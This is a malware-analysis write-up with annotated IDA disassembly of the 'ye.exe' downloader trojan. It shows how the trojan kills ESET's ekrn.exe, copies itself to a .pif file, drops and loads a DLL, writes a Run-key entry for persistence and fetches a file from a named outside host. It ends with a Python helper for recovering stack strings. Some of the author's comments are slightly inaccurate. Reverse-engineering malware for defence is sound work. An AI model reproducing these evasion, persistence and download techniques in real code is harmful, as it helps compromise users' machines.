Analysis of the ye.exe downloader trojan
Author: 麦小扣

File name: 9648c7cc2f01d7b67718cb89a48d927e
File hash: 9648c7cc2f01d7b67718cb89a48d927e
File size: 31528 bytes
Created: 2012-04-13 02:01:37
File type: EXE
PEiD: UPX 2.93 (LZMA) [Overlay] *
Systems possibly affected: Windows

Detailed analysis / functionality

1. UPX-unpack and run the original program
2. Raise the process's privileges and create a mutex
3. Save a copy of itself to a file
4. Drop a DLL, load it, and modify the registry so the DLL starts automatically
5. Download the file "http://c.shidaihuabian.com/s.gif" >> "%windir%tempolm.ini"

Raise the process's privileges, create the mutex, then jump to the main body. Partial disassembly:

```
CODE:00401820 push    ebp
CODE:00401821 mov     ebp, esp
CODE:00401823 sub     esp, 174h
CODE:00401829 push    ebx
CODE:0040182A push    esi
CODE:0040182B push    1
CODE:0040182D call    _Rtladjustprivilege   ; raise the whole process's privilege to 14h (14h = SeDebugPrivilege)
CODE:00401832 push    104h
CODE:00401837 push    offset modulepath
CODE:0040183C push    0
CODE:0040183E call    _getmodulefilename    ; returns the path of the current executable
CODE:00401843 add     esp, 10h
CODE:00401846 mov     al, 's'
CODE:00401848 mov     [ebp+var_10], al
CODE:0040184B mov     [ebp+var_42], al
CODE:0040184E push    offset Name           ; "KAIFAONGQUMEIGANDE"
CODE:00401853 mov     bl, 'e'
CODE:00401855 mov     al, 'E'
CODE:00401857 push    0                     ; bInitialOwner
CODE:00401859 push    0                     ; lpMutexAttributes
CODE:0040185B mov     [ebp+var_8], 'o'
CODE:0040185F mov     [ebp+var_7], 'p'
CODE:00401863 mov     [ebp+var_6], bl       ; e
CODE:00401866 mov     [ebp+var_5], 'n'
CODE:0040186A mov     [ebp+var_4], 0
CODE:0040186E mov     [ebp+var_F], 'c'
CODE:00401872 mov     [ebp+var_E], '.'
CODE:00401876 mov     [ebp+var_D], bl       ; e
CODE:00401879 mov     [ebp+var_C], 'x'
CODE:0040187D mov     [ebp+var_B], bl       ; e
CODE:00401880 mov     [ebp+var_A], 0
CODE:00401884 mov     [ebp+var_44], 't'
CODE:00401888 mov     [ebp+var_43], 'a'
CODE:0040188C mov     [ebp+var_41], 'k'
CODE:00401890 mov     [ebp+var_40], 'k'
CODE:00401894 mov     [ebp+var_3F], 'i'
CODE:00401898 mov     [ebp+var_3E], 'l'
CODE:0040189C mov     [ebp+var_3D], 'l'
CODE:004018A0 mov     [ebp+var_3C], '.'
CODE:004018A4 mov     [ebp+var_3B], bl      ; e
CODE:004018A7 mov     [ebp+var_3A], 78h     ; 'x'
CODE:004018AB mov     [ebp+var_39], bl      ; e
CODE:004018AE mov     [ebp+var_38], 0
CODE:004018B2 mov     [ebp+var_28], bl      ; e
CODE:004018B5 mov     [ebp+var_27], 'k'
CODE:004018B9 mov     [ebp+var_26], 'r'
CODE:004018BD mov     [ebp+var_25], 'n'
CODE:004018C1 mov     [ebp+var_24], '.'
CODE:004018C5 mov     [ebp+var_23], al      ; E
CODE:004018C8 mov     [ebp+var_22], 'X'
CODE:004018CC mov     [ebp+var_21], al      ; E
CODE:004018CF mov     [ebp+var_20], 0
CODE:004018CF                               ; stack strings assembled above: "open" (var_8), "sc.exe" (var_10),
CODE:004018CF                               ; "taskkill.exe" (var_44), "ekrn.EXE" (var_28)
CODE:004018D3 call    CreateMutexA          ; create the mutex
CODE:004018D9 mov     esi, eax
CODE:004018DB nop
CODE:004018DC nop
CODE:004018DD nop
CODE:004018DE nop
CODE:004018DF nop
CODE:004018E0 call    GetLastError
CODE:004018E6 cmp     eax, 0B7h             ; 0B7h = ERROR_ALREADY_EXISTS
CODE:004018EB jnz     short @mainpart       ; if the mutex did not already exist, no other instance is running: jump and run the program
CODE:004018ED push    esi
CODE:004018EE call    _closehandle
CODE:004018F3 add     esp, 4
CODE:004018F6 nop
CODE:004018F7 nop
CODE:004018F8 nop
CODE:004018F9 nop
CODE:004018FA push    0                     ; uType
CODE:004018FC push    offset Caption        ; "0"
CODE:00401901 push    offset Caption        ; "0"
CODE:00401906 push    0FFFFFFFFh            ; hWnd
CODE:00401908 call    MessageBoxA
CODE:0040190E push    0                     ; uExitCode
CODE:00401910 call    ExitProcess
CODE:00401916 ; ---------------------------------------------------------------------------
```

Hijack ekrn.exe, drop c:/programfile/common file//rgdltecq//nhoifz.pif, then jump to the part that drops the DLL:

```
CODE:004019BB call    sub_4028D0            ; get the PID of ekrn.exe
CODE:004019C0 add     esp, 4
CODE:004019C3 cmp     eax, 1
CODE:004019C6 jbe     short loc_401A2A      ; if ekrn.exe is not running, jump; if it is, deal with it first
CODE:004019C8 push    0
CODE:004019CA lea     ecx, [ebp+var_50]
CODE:004019CD push    0
CODE:004019CF lea     edx, [ebp+var_10]     ; "sc.exe"
CODE:004019D2 push    ecx
CODE:004019D3 lea     eax, [ebp+var_8]      ; "open"
CODE:004019D6 push    edx
CODE:004019D7 push    eax
CODE:004019D8 push    0
CODE:004019DA call    sub_4027A0            ; arguments are laid out like ShellExecuteA(0, "open", "sc.exe", var_50, 0, 0)
CODE:004019DF push    1F4h
CODE:004019E4 call    _Sleep
CODE:004019E9 push    0
CODE:004019EB lea     ecx, [ebp+var_60]
CODE:004019EE push    0
CODE:004019F0 lea     edx, [ebp+var_44]     ; "taskkill.exe"
CODE:004019F3 push    ecx
CODE:004019F4 lea     eax, [ebp+var_8]      ; "open"
CODE:004019F7 push    edx
CODE:004019F8 push    eax
CODE:004019F9 push    0
CODE:004019FB call    sub_4027A0
CODE:00401A00 push    1F4h
CODE:00401A05 call    _Sleep
CODE:00401A0A nop
CODE:00401A0B nop
CODE:00401A0C nop
CODE:00401A0D nop
CODE:00401A0E nop
CODE:00401A0F nop
CODE:00401A10 push    0
CODE:00401A12 lea     ecx, [ebp+var_70]
CODE:00401A15 push    0
CODE:00401A17 lea     edx, [ebp+var_44]     ; "taskkill.exe"
CODE:00401A1A push    ecx
CODE:00401A1B lea     eax, [ebp+var_8]      ; "open"
CODE:00401A1E push    edx
CODE:00401A1F push    eax
CODE:00401A20 push    0
CODE:00401A22 call    sub_4027A0
CODE:00401A27 add     esp, 50h
CODE:00401A2A
CODE:00401A2A loc_401A2A:                   ; CODE XREF: start+1A6j
CODE:00401A2A push    edi
CODE:00401A2B mov     ecx, 40h
CODE:00401A30 xor     eax, eax
CODE:00401A32 lea     edi, [ebp+var_173]
CODE:00401A38 mov     [ebp+floderpath], 0
CODE:00401A3F push    1                     ; fCreate: create the folder if it does not exist
CODE:00401A41 rep stosd
CODE:00401A43 stosw
CODE:00401A45 lea     ecx, [ebp+floderpath]
CODE:00401A4B push    2Bh                   ; c:/programfile/common file (CSIDL 2Bh = CSIDL_PROGRAM_FILES_COMMON)
CODE:00401A4D push    ecx
CODE:00401A4E push    0
CODE:00401A50 stosb                         ; 43 bytes all zero (author's note; stosd/stosw/stosb zero 103h bytes after floderpath[0])
CODE:00401A51 call    _SHGetSpecialFloderPath ; get the path above; create it if it does not exist
CODE:00401A56 mov     esi, lstrcat
CODE:00401A5C add     esp, 10h
CODE:00401A5F lea     edx, [ebp+floderpath]
CODE:00401A65 mov     [ebp+Caption], 'r'
CODE:00401A69 push    offset asc_41D8C8     ; "\"
CODE:00401A6E push    edx
CODE:00401A6F mov     [ebp+var_1B], 'g'
CODE:00401A73 mov     [ebp+var_1A], 'd'
CODE:00401A77 mov     [ebp+var_19], 'l'
CODE:00401A7B mov     [ebp+var_18], 't'
CODE:00401A7F mov     [ebp+var_17], bl      ; e
CODE:00401A82 mov     [ebp+var_16], 'c'
CODE:00401A86 mov     [ebp+var_15], 'q'
CODE:00401A8A mov     [ebp+var_14], 0       ; Caption now holds "rgdltecq"
CODE:00401A8E call    esi                   ; lstrcat
CODE:00401A90 lea     eax, [ebp+Caption]
CODE:00401A93 lea     ecx, [ebp+floderpath]
CODE:00401A99 push    eax
CODE:00401A9A push    ecx
CODE:00401A9B call    esi                   ; lstrcat
CODE:00401A9D lea     edx, [ebp+Caption]
CODE:00401AA0 push    0                     ; uType
CODE:00401AA2 lea     eax, [ebp+floderpath]
CODE:00401AA8 push    edx                   ; lpCaption: rgdltecq
CODE:00401AA9 push    eax                   ; lpText: c:/programfile/common file//rgdltecq
CODE:00401AAA push    0FFFFFFFFh            ; hWnd
CODE:00401AAC call    MessageBoxA
CODE:00401AB2 lea     ecx, [ebp+floderpath]
CODE:00401AB8 push    0
CODE:00401ABA push    ecx
CODE:00401ABB call    _CreateDirectory      ; create the folder c:/programfile/common file//rgdltecq
CODE:00401AC0 add     esp, 8
CODE:00401AC3 lea     edx, [ebp+floderpath]
CODE:00401AC9 mov     [ebp+var_34], 'n'
CODE:00401ACD mov     [ebp+var_33], 'h'
CODE:00401AD1 push    offset asc_41D8C8     ; "\"
CODE:00401AD6 push    edx
CODE:00401AD7 mov     [ebp+var_32], 'o'
CODE:00401ADB mov     [ebp+var_31], 'i'
CODE:00401ADF mov     [ebp+var_30], 'f'
CODE:00401AE3 mov     [ebp+var_2F], 'z'
CODE:00401AE7 mov     [ebp+var_2E], '.'
CODE:00401AEB mov     [ebp+var_2D], 'p'
CODE:00401AEF mov     [ebp+var_2C], 'i'
CODE:00401AF3 mov     [ebp+var_2B], 'f'
CODE:00401AF7 mov     [ebp+var_2A], 0       ; var_34 now holds "nhoifz.pif"
CODE:00401AFB call    esi                   ; lstrcat
CODE:00401AFD lea     eax, [ebp+var_34]
CODE:00401B00 lea     ecx, [ebp+floderpath]
CODE:00401B06 push    eax
CODE:00401B07 push    ecx
CODE:00401B08 call    esi                   ; lstrcat
CODE:00401B0A lea     edx, [ebp+floderpath] ; c:/programfile/common file//rgdltecq//nhoifz.pif
CODE:00401B10 push    0
CODE:00401B12 push    edx
CODE:00401B13 push    offset modulepath
CODE:00401B18 call    _copyfilename         ; copy the current file to the path above
CODE:00401B1D push    0FA0h
CODE:00401B22 call    _Sleep
CODE:00401B27 add     esp, 10h
CODE:00401B2A call    loc_4015B0
CODE:00401B2F pop     edi
CODE:00401B30 pop     esi
CODE:00401B31 mov     eax, 1
CODE:00401B36 pop     ebx
CODE:00401B37 mov     esp, ebp
CODE:00401B39 pop     ebp
CODE:00401B3A retn
CODE:00401B3A start   endp
CODE:00401B3A
CODE:00401B3A ; ---------------------------------------------------------------------------
```

Drop the DLL, load it, and modify the registry so the DLL is loaded automatically at startup. Analysing this part took a long time; the DLL itself will have to wait until next time.

```
CODE:004015B0 loc_4015B0:                   ; CODE XREF: start+30Ap
CODE:004015B0 push    ebp
CODE:004015B1 mov     ebp, esp
CODE:004015B3 sub     esp, 1E0h
CODE:004015B9 push    ebx
CODE:004015BA push    esi
CODE:004015BB push    edi
CODE:004015BC nop
CODE:004015BD nop
CODE:004015BE nop
CODE:004015BF nop
CODE:004015C0 jb      short loc_4015C5      ; jb and jnb to the same target: one of them always branches over the junk byte below
CODE:004015C2 jnb     short loc_4015C5      ; (anti-disassembly: a linear sweep would decode 0E8h as the start of a call)
CODE:004015C2 ; ---------------------------------------------------------------------------
CODE:004015C4 db 0E8h                       ; ?
CODE:004015C5 ; ---------------------------------------------------------------------------
CODE:004015C5
CODE:004015C5 loc_4015C5:                   ; CODE XREF: CODE:004015C0j
CODE:004015C5                               ; CODE:004015C2j
CODE:004015C5 mov     ecx, 40h
CODE:004015CA xor     eax, eax
CODE:004015CC lea     edi, [ebp-14Bh]
CODE:004015D2 mov     byte ptr [ebp-14Ch], 0
CODE:004015D9 rep stosd
CODE:004015DB stosw
CODE:004015DD stosb                         ; zero 43h bytes starting at -14Bh (author's note; the sequence zeroes 103h bytes)
CODE:004015DE lea     eax, [ebp-14Ch]
CODE:004015E4 push    104h
CODE:004015E9 push    eax
CODE:004015EA call    _getsystemdirectory   ; get the system directory
CODE:004015EF xor     ecx, ecx
CODE:004015F1 add     esp, 8
CODE:004015F4 mov     [ebp-47h], ecx
CODE:004015F7 mov     byte ptr [ebp-48h], 0
CODE:004015FB mov     [ebp-43h], cx
CODE:004015FF mov     [ebp-41h], cl
CODE:00401602 call    GetTickCount
CODE:00401608 push    eax
CODE:00401609 lea     edx, [ebp-48h]
CODE:0040160C push    offset aD_dll         ; "\%d.DLL"
CODE:00401611 push    edx
CODE:00401612 call    wsprintfA             ; systemruntime.dll (the %d is the tick count, so the file name differs on every run)
CODE:00401618 lea     edi, [ebp-48h]
CODE:0040161B or      ecx, 0FFFFFFFFh
CODE:0040161E xor     eax, eax
CODE:00401620 add     esp, 0Ch
CODE:00401623 repne scasb                   ; length of the "\%d.DLL" name
CODE:00401625 not     ecx
CODE:00401627 sub     edi, ecx
CODE:00401629 lea     edx, [ebp-14Ch]
CODE:0040162F mov     esi, edi
CODE:00401631 mov     ebx, ecx
CODE:00401633 mov     edi, edx
CODE:00401635 or      ecx, 0FFFFFFFFh
CODE:00401638 repne scasb                   ; find the end of the system directory string
CODE:0040163A mov     ecx, ebx
CODE:0040163C dec     edi
CODE:0040163D shr     ecx, 2
CODE:00401640 rep movsd                     ; inlined strcat: append the DLL name to the system directory
CODE:00401642 push    eax
CODE:00401643 mov     ecx, ebx
CODE:00401645 lea     eax, [ebp-14Ch]       ; %system%systemruntime.dll
CODE:0040164B and     ecx, 3
CODE:0040164E push    eax
CODE:0040164F push    offset a1             ; "1"
CODE:00401654 rep movsb
CODE:00401656 push    0FFFFFFFFh
CODE:00401658 call    MessageBoxA
CODE:0040165E lea     ecx, [ebp-14Ch]
CODE:00401664 push    ecx
CODE:00401665 call    @releaseDLL
CODE:0040166A add     esp, 4
CODE:0040166D test    al, al
CODE:0040166F jz      loc_401803            ; DLL drop failed: jump to the end
CODE:00401675 push    1388h
CODE:0040167A call    _Sleep
CODE:0040167F add     esp, 4
CODE:00401682 lea     edx, [ebp-14Ch]
CODE:00401688 push    edx
CODE:00401689 call    LoadLibraryA          ; load the DLL just written
CODE:0040168F mov     esi, eax
CODE:00401691 test    esi, esi
CODE:00401693 jz      loc_401803
CODE:00401699 mov     edi, GetProcaddress
CODE:0040169F lea     eax, [ebp-8]
CODE:004016A2 mov     bl, 'r'
CODE:004016A4 push    eax
CODE:004016A5 push    esi
CODE:004016A6 mov     byte ptr [ebp-8], 'W'
CODE:004016AA mov     byte ptr [ebp-7], 'h'
CODE:004016AE mov     byte ptr [ebp-6], 'a'
CODE:004016B2 mov     byte ptr [ebp-5], 'i'
CODE:004016B6 mov     byte ptr [ebp-4], 'e'
CODE:004016BA mov     [ebp-3], bl           ; r
CODE:004016BD mov     byte ptr [ebp-2], 0
CODE:004016C1 call    edi                   ; GetProcAddress ; whaier
CODE:004016C3 push    0
CODE:004016C5 call    eax                   ; call the dropped DLL's whaier export
CODE:004016C7 push    1388h
CODE:004016CC call    _Sleep
CODE:004016D1 add     esp, 8
CODE:004016D4 lea     ecx, [ebp-10h]
CODE:004016D7 mov     byte ptr [ebp-10h], 'S'
CODE:004016DB mov     byte ptr [ebp-0Fh], 'i'
CODE:004016DF push    ecx
CODE:004016E0 push    esi
CODE:004016E1 mov     byte ptr [ebp-0Eh], 'm'
CODE:004016E5 mov     byte ptr [ebp-0Dh], 'e'
CODE:004016E9 mov     byte ptr [ebp-0Ch], 'n'
CODE:004016ED mov     byte ptr [ebp-0Bh], 'z'
CODE:004016F1 mov     byte ptr [ebp-0Ah], 'e'
CODE:004016F5 mov     byte ptr [ebp-9], 0
CODE:004016F9 call    edi                   ; GetProcAddress ; simenze
CODE:004016FB push    0
CODE:004016FD call    eax
CODE:004016FF add     esp, 4
CODE:00401702 lea     edx, [ebp-1E0h]
CODE:00401708 mov     dword ptr [ebp-1E0h], 94h ; OSVERSIONINFOA.dwOSVersionInfoSize
CODE:00401712 push    edx
CODE:00401713 call    GetVersionExA
CODE:00401719 cmp     dword ptr [ebp-1DCh], 6 ; dwMajorVersion
CODE:00401720 jnb     short loc_401736      ; Windows version above 98
CODE:00401722 lea     eax, [ebp-14Ch]
CODE:00401728 push    eax
CODE:00401729 call    @change_reg2
CODE:0040172E add     esp, 4
CODE:00401731 jmp     loc_401803
CODE:00401736 ; ---------------------------------------------------------------------------
CODE:00401736
CODE:00401736 loc_401736:                   ; CODE XREF: CODE:00401720j
CODE:00401736 call    @change_reg           ; modify the registry to raise privileges and make the virus safer
CODE:0040173B mov     cl, '\'               ; path separator (the character was lost in extraction; inferred from the key path assembled below)
CODE:0040173D push    offset modulepath
CODE:00401742 mov     [ebp-38h], cl
CODE:00401745 mov     [ebp-2Eh], cl
CODE:00401748 mov     [ebp-26h], cl
CODE:0040174B mov     [ebp-17h], cl
CODE:0040174E lea     ecx, [ebp-40h]
CODE:00401751 push    offset a360se         ; "360se"
CODE:00401756 mov     al, 'o'
CODE:00401758 mov     dl, 's'
CODE:0040175A push    ecx
CODE:0040175B push    80000002h             ; HKEY_LOCAL_MACHINE
CODE:00401760 mov     byte ptr [ebp-40h], 'S'
CODE:00401764 mov     [ebp-3Fh], al         ; o
CODE:00401767 mov     byte ptr [ebp-3Eh], 'f'
CODE:0040176B mov     byte ptr [ebp-3Dh], 't'
CODE:0040176F mov     byte ptr [ebp-3Ch], 'w'
CODE:00401773 mov     byte ptr [ebp-3Bh], 'a'
CODE:00401777 mov     [ebp-3Ah], bl         ; r
CODE:0040177A mov     byte ptr [ebp-39h], 'e'
CODE:0040177E mov     byte ptr [ebp-37h], 'M'
CODE:00401782 mov     byte ptr [ebp-36h], 'i'
CODE:00401786 mov     byte ptr [ebp-35h], 'c'
CODE:0040178A mov     [ebp-34h], bl         ; r
CODE:0040178D mov     [ebp-33h], al         ; o
CODE:00401790 mov     [ebp-32h], dl         ; s
CODE:00401793 mov     [ebp-31h], al         ; o
CODE:00401796 mov     byte ptr [ebp-30h], 'f'
CODE:0040179A mov     byte ptr [ebp-2Fh], 't'
CODE:0040179E mov     byte ptr [ebp-2Dh], 'W'
CODE:004017A2 mov     byte ptr [ebp-2Ch], 'i'
CODE:004017A6 mov     byte ptr [ebp-2Bh], 'n'
CODE:004017AA mov     byte ptr [ebp-2Ah], 'd'
CODE:004017AE mov     [ebp-29h], al         ; o
CODE:004017B1 mov     byte ptr [ebp-28h], 'w'
CODE:004017B5 mov     [ebp-27h], dl         ; s
CODE:004017B8 mov     byte ptr [ebp-25h], 'C'
CODE:004017BC mov     byte ptr [ebp-24h], 'u'
CODE:004017C0 mov     [ebp-23h], bl         ; r
CODE:004017C3 mov     [ebp-22h], bl         ; r
CODE:004017C6 mov     byte ptr [ebp-21h], 'e'
CODE:004017CA mov     byte ptr [ebp-20h], 'n'
CODE:004017CE mov     byte ptr [ebp-1Fh], 't'
CODE:004017D2 mov     byte ptr [ebp-1Eh], 'V'
CODE:004017D6 mov     byte ptr [ebp-1Dh], 'e'
CODE:004017DA mov     [ebp-1Ch], bl         ; r
CODE:004017DD mov     [ebp-1Bh], dl         ; s
CODE:004017E0 mov     byte ptr [ebp-1Ah], 'i'
CODE:004017E4 mov     [ebp-19h], al         ; o
CODE:004017E7 mov     byte ptr [ebp-18h], 'n'
CODE:004017EB mov     byte ptr [ebp-16h], 'R'
CODE:004017EF mov     byte ptr [ebp-15h], 'u'
CODE:004017F3 mov     byte ptr [ebp-14h], 'n'
CODE:004017F7 mov     byte ptr [ebp-13h], 0 ; [ebp-40h] now holds "Software\Microsoft\Windows\CurrentVersion\Run"
CODE:004017FB call    loc_4014B0            ; arguments: HKLM, the Run key path, value name "360se", modulepath
CODE:00401800 add     esp, 10h
CODE:00401803
CODE:00401803 loc_401803:                   ; CODE XREF: CODE:0040166Fj
CODE:00401803                               ; CODE:00401693j ...
CODE:00401803 push    2710h
CODE:00401808 call    Sleep
CODE:0040180E pop     edi
CODE:0040180F pop     esi
CODE:00401810 mov     eax, 1
CODE:00401815 pop     ebx
CODE:00401816 mov     esp, ebp
CODE:00401818 pop     ebp
CODE:00401819 retn
CODE:00401819 ; ---------------------------------------------------------------------------
CODE:0040181A align 10h
```
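Every string this sample needs ("open", "sc.exe", "taskkill.exe", "ekrn.EXE", the export names, the Run key path) is assembled one byte at a time on the stack rather than stored as a literal, a common trick for keeping them out of a plain strings dump. The helper below is an added example, not code from the original post: it recovers such stack strings mechanically from an IDA listing in the page's format by tracking constants loaded into the 8-bit registers, collecting ebp-relative byte stores, and emitting each NUL-terminated run with its frame offset. It assumes the `CODE:addr` line prefix and IDA's `var_N` / `[ebp-Nh]` operand spellings; the listing excerpt is constructed from the first function above.

```python
import re

# Constructed excerpt in the post's IDA listing style: the "open" and "sc.exe" stack
# strings of the first function (offsets and characters as in the listing above).
LISTING = """\
CODE:00401846 mov al, 's'
CODE:00401848 mov [ebp+var_10], al
CODE:00401853 mov bl, 'e'
CODE:0040185B mov [ebp+var_8], 'o'
CODE:0040185F mov [ebp+var_7], 'p'
CODE:00401863 mov [ebp+var_6], bl ; e
CODE:00401866 mov [ebp+var_5], 'n'
CODE:0040186A mov [ebp+var_4], 0
CODE:0040186E mov [ebp+var_F], 'c'
CODE:00401872 mov [ebp+var_E], '.'
CODE:00401876 mov [ebp+var_D], bl ; e
CODE:00401879 mov [ebp+var_C], 'x'
CODE:0040187D mov [ebp+var_B], bl ; e
CODE:00401880 mov [ebp+var_A], 0
"""
MOV_REG = re.compile(r"mov\s+([abcd]l),\s*(\S+)")
MOV_MEM = re.compile(r"mov\s+(?:byte ptr\s+)?\[ebp([+-])(var_[0-9A-F]+|[0-9A-F]+h|\d+)\],\s*(\S+)")

def parse_byte(tok, regs):  # 'c' literal, 78h/0 immediate, or a tracked 8-bit register; else None
    if tok.startswith("'"):
        return ord(tok[1])
    if re.fullmatch(r"[0-9A-Fa-f]+h|\d+", tok):
        return int(tok.rstrip("h"), 16 if tok.endswith("h") else 10)
    return regs.get(tok)

def frame_strings(frame):  # (start offset, text) for each NUL-terminated run of adjacent bytes
    if not frame:
        return []
    lo = min(frame)
    buf = bytearray(b"\xff" * (max(frame) - lo + 1))  # 0xFF marks a slot that was never written
    for off, b in frame.items():
        buf[off - lo] = b
    return [(lo + m.start(), m[1].decode()) for m in re.finditer(rb"([\x20-\x7e]+)\x00", bytes(buf))]

def recover_stack_strings(listing):
    regs, frame = {}, {}  # constants last loaded into al/bl/cl/dl; ebp-relative byte stores
    for line in listing.splitlines():
        text = (line.split(";")[0].split(maxsplit=1) or [""])[-1]  # drop the CODE:addr prefix and comment
        if m := MOV_REG.match(text):
            regs[m[1]] = parse_byte(m[2], regs)  # None when the register receives something untracked
        elif (m := MOV_MEM.match(text)) and (b := parse_byte(m[3], regs)) is not None:
            sign, name, _ = m.groups()
            mag = int(name[4:], 16) if name.startswith("var_") else int(name.rstrip("h"), 16 if name.endswith("h") else 10)
            frame[-mag if sign == "-" or name.startswith("var_") else mag] = b
    return frame_strings(frame)
```

Run it per function (each frame reuses the same offsets), and a run that never receives its NUL, such as the lone 's' the sample parks at var_42 for "taskkill.exe", is dropped rather than reported as a string.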